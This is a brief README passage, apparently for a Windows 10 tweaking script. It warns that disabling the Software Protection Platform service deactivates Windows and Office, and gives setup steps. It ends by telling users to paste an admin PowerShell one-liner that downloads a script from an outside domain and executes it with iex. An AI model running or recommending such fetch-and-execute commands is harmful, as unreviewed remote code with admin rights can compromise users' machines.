ChrisTitusTech/win10script/README.md

 - disabling "Microsoft Software Protection Platform Service" will render microsoft activation Service not active hence any microsoft apps, windows, office, etc will show not activated state!

 # How To Use!
-Disable Any Power saving feature under your network Devices. ex: Lan card, Wifi Card etc! also under Network Power Management Untick all marks!
-Click OK and you are good to go!

 Simply Run cmd (Command Prompt) as Administrator and paste the following!
 ```
 powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://tweaks.daddymadu.gg')"